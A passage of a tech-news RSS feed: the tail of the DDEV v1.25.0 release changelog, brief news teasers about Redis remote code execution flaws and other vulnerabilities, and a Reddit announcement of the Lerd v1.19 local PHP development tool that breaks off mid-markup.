<li>build(deps): bump go.mod and docker-compose to v5.0.2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3837948652" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8045" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8045/hovercard" href="https://github.com/ddev/ddev/pull/8045">#8045</a></li>
<li>test(quickstart): add Wagtail (Django) Python, remove FrankenPHP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3842725618" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8049" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8049/hovercard" href="https://github.com/ddev/ddev/pull/8049">#8049</a></li>
<li>fix(cakephp): add new variable APP_FULL_BASE_URL to .env file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajibarra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajibarra">@ajibarra</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3842577307" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8048" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8048/hovercard" href="https://github.com/ddev/ddev/pull/8048">#8048</a></li>
<li>fix(poweroff): Skip poweroff prompt when containers already stopped during version upgrade by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3848144775" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8052" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8052/hovercard" href="https://github.com/ddev/ddev/pull/8052">#8052</a></li>
<li>fix(router): Fix ephemeral port allocation when router is unhealthy, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3830836096" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8041" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8041/hovercard" href="https://github.com/ddev/ddev/issues/8041">#8041</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3847851352" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8051" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8051/hovercard" href="https://github.com/ddev/ddev/pull/8051">#8051</a></li>
<li>feat(add-ons): Use addons.json to avoid GitHub API rate limits, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3508049094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7707" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7707/hovercard" href="https://github.com/ddev/ddev/issues/7707">#7707</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3760928582" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7978" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7978/hovercard" href="https://github.com/ddev/ddev/pull/7978">#7978</a></li>
<li>build(deps): bump actions/setup-python from 6.1.0 to 6.2.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3856858704" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8059" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8059/hovercard" href="https://github.com/ddev/ddev/pull/8059">#8059</a></li>
<li>docs: Update Lagoon provider instructions with sync config, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3768525805" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7990" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7990/hovercard" href="https://github.com/ddev/ddev/issues/7990">#7990</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/froboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/froboy">@froboy</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3768528261" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7991" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7991/hovercard" href="https://github.com/ddev/ddev/pull/7991">#7991</a></li>
<li>test(quickstart): disable symfony tests, update Laravel SQLite, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3855739168" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8058" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8058/hovercard" href="https://github.com/ddev/ddev/issues/8058">#8058</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3861011927" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8060" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8060/hovercard" href="https://github.com/ddev/ddev/pull/8060">#8060</a></li>
<li>feat(drupal12): Drupal 12 is now showing up in dev, support it, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3852470928" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8055" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8055/hovercard" href="https://github.com/ddev/ddev/issues/8055">#8055</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3852526865" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8056" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8056/hovercard" href="https://github.com/ddev/ddev/pull/8056">#8056</a></li>
<li>fix(ddevapp): check file existence in isCustomConfigFile by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3861764625" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8061" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8061/hovercard" href="https://github.com/ddev/ddev/pull/8061">#8061</a></li>
<li>fix(router): bypass CheckRouterPorts when all ports appear busy, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3693813229" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7921" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7921/hovercard" href="https://github.com/ddev/ddev/issues/7921">#7921</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3706631046" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7927" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7927/hovercard" href="https://github.com/ddev/ddev/pull/7927">#7927</a></li>
<li>docs(drupal-cms): In the Drupal CMS quick-start, call drupal recipe:unpack by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/phenaproxima/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/phenaproxima">@phenaproxima</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818313021" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8037" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8037/hovercard" href="https://github.com/ddev/ddev/pull/8037">#8037</a></li>
<li>chore(quickstart): enable tests for symfony, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3855739168" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8058" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8058/hovercard" href="https://github.com/ddev/ddev/issues/8058">#8058</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3865724504" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8070" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8070/hovercard" href="https://github.com/ddev/ddev/pull/8070">#8070</a></li>
<li>feat(commands): add Windows support for DBeaver outside WSL, add cygwin to OSTYPE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ddubau/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ddubau">@ddubau</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862908143" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8065" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8065/hovercard" href="https://github.com/ddev/ddev/pull/8065">#8065</a></li>
<li>build(docker): bump images to v1.25.0 for release, update MariaDB gpg key by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862122088" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8062" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8062/hovercard" href="https://github.com/ddev/ddev/pull/8062">#8062</a></li>
<li>fix(lagoon): bug in lagoon-sync means it fails if ~/.ssh/known_hosts doesn't exist [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3866685126" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8072" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8072/hovercard" href="https://github.com/ddev/ddev/pull/8072">#8072</a></li>
<li>fix(healthcheck): resolve optional profiles to services, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541461422" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7745" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7745/hovercard" href="https://github.com/ddev/ddev/pull/7745">#7745</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3866582672" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8071" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8071/hovercard" href="https://github.com/ddev/ddev/pull/8071">#8071</a></li>
<li>test(quickstart): fix Statamic check for login page by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3867068600" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8073" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8073/hovercard" href="https://github.com/ddev/ddev/pull/8073">#8073</a></li>
<li>test: fix drupal.bats for drupal cms 2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3867749985" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8074" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8074/hovercard" href="https://github.com/ddev/ddev/pull/8074">#8074</a></li>
<li>test: add DDEV_EMBARGO_TESTS to skip tests via environment variable, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3871275997" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8076" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8076/hovercard" href="https://github.com/ddev/ddev/issues/8076">#8076</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3871353826" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8077" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8077/hovercard" href="https://github.com/ddev/ddev/pull/8077">#8077</a></li>
<li>build(webserver): fix check for MariaDB keyring [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872270038" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8078" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8078/hovercard" href="https://github.com/ddev/ddev/pull/8078">#8078</a></li>
<li>chore: update version history for v1.25.0, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3716704952" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7934" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7934/hovercard" href="https://github.com/ddev/ddev/issues/7934">#7934</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872319811" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8079" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8079/hovercard" href="https://github.com/ddev/ddev/pull/8079">#8079</a></li>
<li>test: skip TestExtractCurlBody when httpbin.org is unavailable [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872748552" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8080" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8080/hovercard" href="https://github.com/ddev/ddev/pull/8080">#8080</a></li>
<li>test(openmage): add --no-security-blocking to openmage.bats for Composer 2.9 compatibility [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888458213" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8092" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8092/hovercard" href="https://github.com/ddev/ddev/pull/8092">#8092</a></li>
<li>chore(github): update PR template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887168991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8089" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8089/hovercard" href="https://github.com/ddev/ddev/pull/8089">#8089</a></li>
<li>fix(heidisql): get basename for postgres library, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3877835266" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8086" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8086/hovercard" href="https://github.com/ddev/ddev/issues/8086">#8086</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887098479" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8087" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8087/hovercard" href="https://github.com/ddev/ddev/pull/8087">#8087</a></li>
<li>fix(add-on): Re-add the output suggesting ddev restart after add-on, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887131086" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8088" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8088/hovercard" href="https://github.com/ddev/ddev/issues/8088">#8088</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887425861" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8090" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8090/hovercard" href="https://github.com/ddev/ddev/pull/8090">#8090</a></li>
<li>docs: add note on restarting for environment variable changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MurzNN/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MurzNN">@MurzNN</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3889575340" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8093" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8093/hovercard" href="https://github.com/ddev/ddev/pull/8093">#8093</a></li>
<li>fix(add-on): normalize <code>ddev add-on get</code> output when there's no version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3890604590" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8094" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8094/hovercard" href="https://github.com/ddev/ddev/pull/8094">#8094</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/q0rban/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/q0rban">@q0rban</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626113413" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7861" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7861/hovercard" href="https://github.com/ddev/ddev/pull/7861">#7861</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BreathCodeFlow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BreathCodeFlow">@BreathCodeFlow</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3658037285" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7893" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7893/hovercard" href="https://github.com/ddev/ddev/pull/7893">#7893</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crowjake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crowjake">@crowjake</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3669387046" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7907" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7907/hovercard" href="https://github.com/ddev/ddev/pull/7907">#7907</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/grummbeer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/grummbeer">@grummbeer</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3633286534" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7872" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7872/hovercard" href="https://github.com/ddev/ddev/pull/7872">#7872</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JUVOJustin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JUVOJustin">@JUVOJustin</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3730518709" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7942" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7942/hovercard" href="https://github.com/ddev/ddev/pull/7942">#7942</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lguigo22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lguigo22">@lguigo22</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3756979012" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7975" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7975/hovercard" href="https://github.com/ddev/ddev/pull/7975">#7975</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codebymikey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codebymikey">@codebymikey</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789513134" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8008" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8008/hovercard" href="https://github.com/ddev/ddev/pull/8008">#8008</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Franky5831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Franky5831">@Franky5831</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3622910076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7853" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7853/hovercard" href="https://github.com/ddev/ddev/pull/7853">#7853</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ddubau/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ddubau">@ddubau</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862908143" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8065" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8065/hovercard" href="https://github.com/ddev/ddev/pull/8065">#8065</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.10...v1.25.0"><tt>v1.24.10...v1.25.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis Vulnerabilities Enables Remote Code Execution Attacks]]></title>
<description><![CDATA[Five dangerous vulnerabilities in Redis expose Redis Cloud, Redis Software, and all open-source community editions to potential remote code execution, giving authenticated attackers a direct path to compromise affected systems. All require authenticated access to exploit, but successful exploitat...]]></description>
<link>https://tsecurity.de/de/3496059/it-security-nachrichten/critical-redis-vulnerabilities-enables-remote-code-execution-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496059/it-security-nachrichten/critical-redis-vulnerabilities-enables-remote-code-execution-attacks/</guid>
<pubDate>Thu, 07 May 2026 15:11:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five dangerous vulnerabilities in Redis expose Redis Cloud, Redis Software, and all open-source community editions to potential remote code execution, giving authenticated attackers a direct path to compromise affected systems. All require authenticated access to exploit, but successful exploitation can…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-redis-vulnerabilities-enables-remote-code-execution-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-redis-vulnerabilities-enables-remote-code-execution-attacks/">Critical Redis Vulnerabilities Enables Remote Code Execution Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-05-07 15h : 8 posts]]></title>
<description><![CDATA[8 posts were published in the last hour 13:4 : Palo Alto Networks Firewall Zero-Day RCE Vulnerability Exploited in the Wild Since April 13:4 : Critical Redis Vulnerabilities Enables Remote Code Execution Attacks 13:4 : WatchGuard Agent Vulnerabilities Let Attackers…
Read more →
The post IT Securi...]]></description>
<link>https://tsecurity.de/de/3496057/it-security-nachrichten/it-security-news-hourly-summary-2026-05-07-15h-8-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496057/it-security-nachrichten/it-security-news-hourly-summary-2026-05-07-15h-8-posts/</guid>
<pubDate>Thu, 07 May 2026 15:11:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>8 posts were published in the last hour 13:4 : Palo Alto Networks Firewall Zero-Day RCE Vulnerability Exploited in the Wild Since April 13:4 : Critical Redis Vulnerabilities Enables Remote Code Execution Attacks 13:4 : WatchGuard Agent Vulnerabilities Let Attackers…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-07-15h-8-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-07-15h-8-posts/">IT Security News Hourly Summary 2026-05-07 15h : 8 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lerd v1.19, rootless-Podman local PHP dev env for Linux, follow-up since 1.0]]></title>
<description><![CDATA[I posted lerd here at the 1.0 launch and got really useful feedback from folks running it on everything from Arch and Fedora to Ubuntu and NixOS. Coming back with an update since the Linux story has improved a lot. For anyone new, lerd is an open source local PHP dev environment built on rootless...]]></description>
<link>https://tsecurity.de/de/3496033/linux-tipps/lerd-v119-rootless-podman-local-php-dev-env-for-linux-follow-up-since-10/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496033/linux-tipps/lerd-v119-rootless-podman-local-php-dev-env-for-linux-follow-up-since-10/</guid>
<pubDate>Thu, 07 May 2026 14:56:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I posted lerd here at the 1.0 launch and got really useful feedback from folks running it on everything from Arch and Fedora to Ubuntu and NixOS. Coming back with an update since the Linux story has improved a lot.</p> <p>For anyone new, lerd is an open source local PHP dev environment built on rootless Podman, no docker desktop, no daemon as root, ships as a single Go binary. It detects your project's framework automatically and gives you .test domains, per-project PHP version isolation, one-command HTTPS, and a stack of common services (MySQL, Postgres, Redis, Meilisearch, Mailpit) plus one-click presets for phpMyAdmin, pgAdmin, and others. Everything goes through systemd user units and Podman quadlets, no sudo required after install.</p> <p>Highlights since the launch post:</p> <ul> <li>Install works on Ubuntu 26.04 (sudo-rs), Fedora 41+, Arch, openSUSE Tumbleweed, NixOS, anything with strict-sudo defaults.</li> <li>Optional install mode that doesn't touch system DNS, sites resolve via *.localhost instead.</li> <li>lerd doctor walks the whole DNS chain (lerd-dns, dnsmasq, port 5300, dig, resolver hookup, system lookup) and tells you exactly which rung is broken instead of one vague error.</li> <li>First-class omarchy support.</li> <li>Idle CPU is near zero with the dashboard open, the cache backs off when systemd-logind reports the session as idle or locked.</li> <li>Dual-stack IPv4 + IPv6 with auto-detection (--no-ipv6 to opt out).</li> <li>Btop-style lerd tui for terminal folks, near-parity with the web dashboard.</li> </ul> <p>Would love feedback from Linux devs, especially if your distro hits anything weird with DNS or systemd. Stars on GitHub help a lot if you like the project.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/geodro"> /u/geodro </a> <br> <span><a href="http://github.com/geodro/lerd">[link]</a></span>   <span><a 